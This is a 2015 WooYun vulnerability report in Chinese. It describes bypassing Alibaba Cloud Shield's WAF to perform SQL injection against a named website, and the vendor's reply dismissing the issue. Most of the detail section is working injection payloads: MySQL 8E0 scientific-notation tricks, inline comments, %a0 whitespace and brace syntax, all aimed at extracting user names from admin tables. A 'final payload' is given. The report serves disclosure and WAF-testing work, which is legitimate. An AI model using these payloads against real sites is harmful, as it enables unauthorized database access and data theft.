漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0110382
漏洞标题:阿里巴巴云盾防御策略可以bypass
相关厂商:阿里巴巴
漏洞作者: izy
提交时间:2015-04-26 10:51
修复时间:2015-04-27 09:43
公开时间:2015-04-27 09:43
漏洞类型:设计缺陷/逻辑错误
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-26: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
阿里云盾防御bypass
详细说明:
现在很多waf都是检查单词边界,但是mysql很多特性导致我们可以绕过这些边界检查。
http://www.alijijinhui.org/index.php?id=1 union -------OK
http://www.alijijinhui.org/index.php?id=1 union select -------拦截
用mysql特性8E0 bypass 详情见 http://zone.wooyun.org/content/16772
http://www.alijijinhui.org/index.php?id=08Eunion select -------bypass
http://www.alijijinhui.org/index.php?id=08Eunion select 1,2,3%23 -------bypass
然后我们随便查一个表admin
/index.php?id=08Eunion select user from %23 -------拦截
当我们查到from时就被拦截了,说明from是关键字,来验证一下
/index.php?id=08Eunion select user fr1om/*./*/admin%23 ------- bypass
说明from被拦截了
现在我们只要绕过from这的拦截就完全bypass啦~
而首先的思路是测试单词边界
http://www.alijijinhui.org/index.php?id=8E0union/*.1*/select user from%a0admin%23 -------- bypass
http://www.alijijinhui.org/index.php?id=1 union/*.1*/select user from%a0admin%23 -------- bypass
另外一种方式
先来了解一下mysql的一个tip:
select{x user}from{x admin} 这样也是可以查询的~
本地测试ok:
select user from users where user_id =8E0union/*.1*/select{x user}from{x users}#
暑假来阿里实习就可以来膜拜各位大牛了!~ :-D
漏洞证明:
最终payload:
http://www.alijijinhui.org/index.php?id=8E0union/*.1*/select{x user}from{x users}%23
http://www.alijijinhui.org/index.php?id=1 union/*.1*/select user from%a0admin%23
修复方案:
~~~
版权声明:转载请注明来源 izy@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-04-27 09:43
厂商回复:
亲,经审核您所报告的问题,不存在安全隐患。如果您对云盾有其他任何好的建议,请随时在ASRC报告,我们会第一时间响应。感谢你对我们的支持与关注。
最新状态:
暂无